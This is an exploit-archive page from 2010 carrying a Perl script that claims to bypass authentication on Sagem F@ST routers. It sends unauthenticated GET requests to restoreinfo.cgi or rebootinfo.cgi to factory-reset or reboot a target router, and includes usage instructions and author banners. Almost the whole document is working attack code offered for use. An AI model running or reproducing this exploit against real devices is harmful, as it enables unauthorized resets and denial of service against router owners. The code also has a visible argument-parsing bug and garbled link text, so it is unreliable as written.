Home / os / winme

Sagem Routers Remote Auth bypass Exploit

Posted on 04 March 2010

======================================== Sagem Routers Remote Auth bypass Exploit ======================================== #!/usr/bin/perl # Exploit Title: Sagem routers Remote auth bypass Exploit # Date: 04/03/2010 # Author: AlpHaNiX # Software Link: null # Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404 # Tested on: Sagem F@ST 2404 # Code : use HTTP::Request; use HTTP::Headers; use LWP::UserAgent; system('cls'); sub help() { print " [X] the target must be sagem rooter main ip adress ". "[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) ". "[X] Usage : perl $0 --function ip ". "[X] Example : ./exploit.pl<http://exploit.pl> --reset 192.168.1.1 ". "[X] Example : ./exploit.pl<http://exploit.pl> --reboot 192.168.1.1 "; } sub header() { print " [+]====================================[+] ". "[+] Sagem routers Remote Auth bypass [+] ". "[+] Found And Exploit By AlpHaNiX [+] ". "[+] Contact : AlpHa[at]Hacker[dot]Bz [+] ". "[+] HomePage : NullArea.Net [+] ". "[+]====================================[+] " } sub resetz() { my $target = $ipz."restoreinfo.cgi" ; my $request = HTTP::Request->new(GET=>$target); my $useragent = LWP::UserAgent->new(); my $response = $useragent->request($request); if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/ && $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ ) { print "[+] Authentication bypassed ! " ; print "[+] Exploited , $ip is restored" ; } else { print "[+] Please make sure you entered real sagem router ip " ; } } sub reboot() { my $target = $ipz."rebootinfo.cgi" ; my $request = HTTP::Request->new(GET=>$target); my $useragent = LWP::UserAgent->new(); my $response = $useragent->request($request); if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/ && $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ ) { print "[+] Authentication bypassed ! " ; print "[+] Exploited , $ip is rebooted" ; } else { print "[+] Please make sure you entered real sagem router ip " ; } } if (@ARGV != 2) { header();help(); exit(); } else{ my $i=0; foreach (@ARGV) { if ($ARGV[$i] eq "--reboot"){$ip = $ARGV[$i+1];$function = 'reboot';} if ($ARGV[$i] eq "--reset"){$ip = $ARGV[$i];$function = 'reset';} $i++; } if ($ip =~ /http:/// ) { $ipz = $ip."/"; } else { $ipz = "http://".$ip."/"} header(); print "[+] Working on $ip .. "; if($function eq 'reboot'){reboot()} if($function eq 'reset'){resetz()} } # ~ - [ [ : Inj3ct0r : ] ]

 

TOP